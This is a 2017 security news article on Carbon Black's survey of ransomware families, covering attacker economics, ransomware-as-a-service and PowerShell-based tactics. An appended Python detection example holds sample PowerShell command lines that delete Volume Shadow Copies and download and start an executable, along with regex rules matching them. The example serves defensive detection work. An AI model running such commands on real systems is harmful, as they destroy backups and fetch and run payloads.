IT Security Guru
Mass-Scale Ransomware Attacks Providing Hackers the Ability to Earn Quick Money

by The Gurus
September 22, 2017
in This Week's Gurus

During the past six months, the Carbon Black Threat Analysis Unit (TAU) analysed more than 1,000 ransomware samples, categorising them into 150 families, and found the following:

  • Attackers are looking to make quick, easy money with unsophisticated malware combined with sophisticated delivery methods. The majority of today’s ransomware aims to target the largest vulnerable population possible.
  • “Ransomware as a Service (RaaS)” and the emergence of Bitcoin have lowered the barrier to entry even further for attackers.
  • Some ransomware is beginning to implement non-malware tactics that leverage “trusted” native tools, such as Microsoft’s PowerShell. These tools can be used in the propagation of the ransomware as well as file encryption.
  • Nearly 99% of ransomware attacks we analysed targeted Microsoft products. Mac users were largely untouched by the ransomware samples we researched.

Overview
If global headlines in recent months are to be believed, ransomware’s increased ubiquity and sophistication have reached epidemic proportions. According to these reports, malware such as WannaCry and NotPetya have thrust ransomware into the public’s consciousness in an unprecedented fashion, while businesses around the globe scramble to keep up with the onslaught of attacks.
While it’s true that ransomware is more ubiquitous today than ever, a different reality exists when it comes to sophistication. According to a recent analysis of a large set of ransomware families by the Carbon Black TAU, the majority of today’s ransomware errs on the side of simplicity in an effort to target a mass set of victims as easily and quickly as possible. The net? Attackers are looking to make quick, easy money with unsophisticated malware, combined with sophisticated delivery methods.
To understand the world of ransomware, Carbon Black examined a sample set of more than 150 ransomware families. Our analysis reveals the majority of ransomware attacks are guided by simple economics and likely derive from unsophisticated actors who often leverage pre-existing do-it-yourself (DIY) attack kits purchased from the dark web.
Those who are striking out on their own also tend to use more basic programming languages, such as .NET, and reuse code from open-source projects and websites.
Episodic ransomware attacks, such as NotPetya, have made for splashy headlines, but reveal more about the general unpreparedness of worldwide businesses to handle these attacks than they do about a sophisticated evolution of ransomware. These attacks highlight that the industry at large is often failing to do infosec basics, such as patching.
Businesses appear to be focusing too greatly on next-generation threats while being unable to defend against the current era of basic malware. What’s more, the public attention to new threats distracts many organisations from the ability to tool their environments and train their staff to respond to basic attacks.
The level of effort needed to secure environments seems so daunting to many in leadership that an investment in response and recovery would appear to be a better investment. As ransomware grew in prevalence, many businesses accepted the risk of individual machines getting infected and losing localised data. These businesses implemented policies to quickly reimage the machine with its most recent backup and move on.
However, malware such as WannaCry and NotPetya have changed that equation by including worm functionality to spread across networks. Reimaging a single infected system was ineffective if the ransomware was able to quickly move across the network and infect additional systems. Businesses that had accepted the risk of handling a few isolated ransomware incidents now risked losing complete networks. This was seen in various British hospitals, where operations were shut down completely while ransomware automatically spread itself across a widely vulnerable network.
However, just as NotPetya was incrementally more sophisticated compared to WannaCry, the Carbon Black TAU expects a rising-tide evolution of ransomware in the coming months as attackers attempt to further extort money from unprepared businesses and consumers.
While the defences required to limit the spread and damage of ransomware may be easy to determine, deploying them across large organisations is a challenge for many security teams. As ransomware becomes more sophisticated over time, such challenges only increase.
Security teams will have to implement better lines of defence to detect complex malware and adversaries using non-malware attacks to encrypt data. Nor is the development of more sophisticated malware limited to individual adversaries: Ransomware-as-a-Service (RaaS) operators can deploy a single, complex malware to hundreds of thousands of potential victims at a time.
A Deeper Look at Ransomware
For this research, the Carbon Black TAU analysed more than 1,000 ransomware samples, categorising them into more than 150 distinct families. Ransomware, like most other malware applications, can be grouped based upon its development characteristics; its methods of injection; and its unique tactics, techniques, and procedures (TTPs).
These attributes suggest that each group was designed by the same set of developers for the same purpose. Each family could be unique in the encryption routine it uses, the files it targets, the style of ransom note it provides, or even the method in which it collects its ransom.
Our research highlighted some interesting trends:

  • Most of the ransomware samples we evaluated are designed to run in place. Without the need for installation or configuration, these samples start encrypting data immediately after execution. This is in contrast to less frequently seen families that perform more elaborate installation methods before malicious activity starts.
  • Some ransomware families (for example Abpodul) leveraged non-malware tactics. Characterised by files that would not be detected as malicious by legacy antivirus, these threats leverage “trusted” native tools, such as Microsoft’s PowerShell, to delete Volume Shadow Copies and encrypt files. More prevalent malware even used PowerShell as a means to download and run the actual ransomware executable.
  • Ransomware code is less complex than many other forms of malware. A basic ransomware sample simply needs to traverse folders and encrypt files using standard Windows routines. There is very little coding involved to make ransomware, and much of that code can be sourced from other online projects.
  • Attackers are playing a numbers game to launch a mass set of attacks against the largest vulnerable population possible. “Ransomware as a Service” (RaaS) and the emergence of Bitcoin have lowered the barrier to entry for attackers using ransomware. Bitcoin and ransomware are very clearly closely tied, with ransomware experiencing triple-digit percentage growth since Bitcoin’s founding in 2009.
  • By using underground markets and the dark web, Ransomware-as-a-Service provides an adversary with no technical experience the ability to easily sponsor a ransomware campaign with available funds.
  • These “spray and pray” attacks often rely on spamming and phishing campaigns to guarantee a small percentage of infections to extort money. Similar to many spam campaigns, ransomware has been sent en masse to thousands of email addresses at a single organisation, requiring just one person to execute the payload for a successful attack.
  • 99% of ransomware attacks target Microsoft products, given Microsoft’s large market share. Mac users were virtually untouched by the ransomware samples we researched. In fact, we found only a small handful of families targeting macOS. One of those was effectively destructive-ware, since it never sent the encryption key to any command-and-control server, so the data could not be recovered even after payment.
  • The majority of ransomware samples were written in English, a default language for Microsoft Windows products. We also came across samples written in French, German, Chinese, Japanese, and Russian.
  • The trend toward rudimentary ransomware speaks to the current state of cyber defence. On one hand, organisations with nascent (or non-existing) security programmes have been unable to prevent even the most basic attacks. For more robust security teams, the focus on advanced, targeted attacks has potentially detracted from the routine “blocking and tackling” required to stop even attacks that have limited sophistication.
  • Traditional defences are heavily skewed to detecting and blocking malicious files downloaded to a computer system. A reliance on this method distracts defenders from seemingly legitimate applications exhibiting malicious behaviour. Many ransomware attacks are using tools that already exist on the machine (e.g., PowerShell).
  • File-based solutions that focus on static indicators of files, such as file names, unique strings, and hashes, are missing ransomware attacks because they have no visibility into the “DNA” of an attack. Without tracking malicious behaviour and intent, such defensive methods could be unable to accurately predict future attacks involving volatile code leveraging tools such as JavaScript, PowerShell, Visual Basic, and Active Server Pages (ASP).
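The contrast the last two bullets draw, a hash list that only knows yesterday's build versus a rule keyed on what a trusted host tool is asked to do, is easier to see over concrete events. The following is an added example and not code from the article or from Carbon Black; the process-creation events, the hash values and the rule names are all constructed for illustration, and the two rules cover the specific behaviours the article describes (PowerShell removing Volume Shadow Copies, and PowerShell fetching and starting a payload).

```python
import hashlib
import re
# Constructed stand-ins for file hashes; not real indicators from the article.
def fake_sha256(label: str) -> str:
    return hashlib.sha256(label.encode()).hexdigest()

# Static indicator list, as a file-based product would carry it.
KNOWN_BAD_HASHES = {fake_sha256("constructed-sample-build-1")}

# Behavioural rules keyed on what the article describes: a trusted host tool
# removing Volume Shadow Copies, or PowerShell fetching and starting a payload.
BEHAVIOUR_RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows"
        r"|win32_shadowcopy.*?(\.delete\(|remove-wmiobject)"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete", re.I | re.S),
    "powershell_download_and_run": re.compile(
        r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b).*?"
        r"(start-process|invoke-expression|\biex\b|\.exe)", re.I | re.S),
}
HOST_TOOLS = {"powershell.exe", "vssadmin.exe", "wmic.exe", "cmd.exe"}

def hash_detect(event: dict) -> bool:
    # Static check: is the parent (dropped) executable on the block list?
    return event["parent_sha256"] in KNOWN_BAD_HASHES

def behaviour_detect(event: dict) -> list:
    # Behavioural check: which rules fire on a host tool's command line?
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image not in HOST_TOOLS:
        return []
    return [name for name, rx in BEHAVIOUR_RULES.items() if rx.search(event["cmdline"])]

# Constructed process-creation events (hypothetical, not from the article).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "build-1-shadow-delete", "image": PS, "parent_sha256": fake_sha256("constructed-sample-build-1"),
     "cmdline": 'powershell.exe -nop -w hidden -c "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"'},
    # Same behaviour from a recompiled build: the hash changes, the tradecraft does not.
    {"id": "build-2-shadow-delete", "image": PS, "parent_sha256": fake_sha256("constructed-sample-build-2"),
     "cmdline": 'powershell.exe -c "Get-WmiObject Win32_ShadowCopy | Remove-WmiObject"'},
    {"id": "build-2-downloader", "image": PS, "parent_sha256": fake_sha256("constructed-sample-build-2"),
     "cmdline": 'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/x.exe -OutFile C:\\Temp\\x.exe; Start-Process C:\\Temp\\x.exe"'},
    {"id": "admin-inventory", "image": PS, "parent_sha256": fake_sha256("constructed-explorer"),
     "cmdline": 'powershell.exe -c "Get-ChildItem C:\\Users -Recurse | Measure-Object"'},
]

def triage(events: list) -> list:
    # Per event, what each detection layer would have reported.
    return [{"id": e["id"], "hash_hit": hash_detect(e), "behaviour_hits": behaviour_detect(e)}
            for e in events]
```

Running `triage(SAMPLE_EVENTS)` shows the hash list catching only the first build, while the behavioural rules fire on both builds and stay quiet on the benign administrative command.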
© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic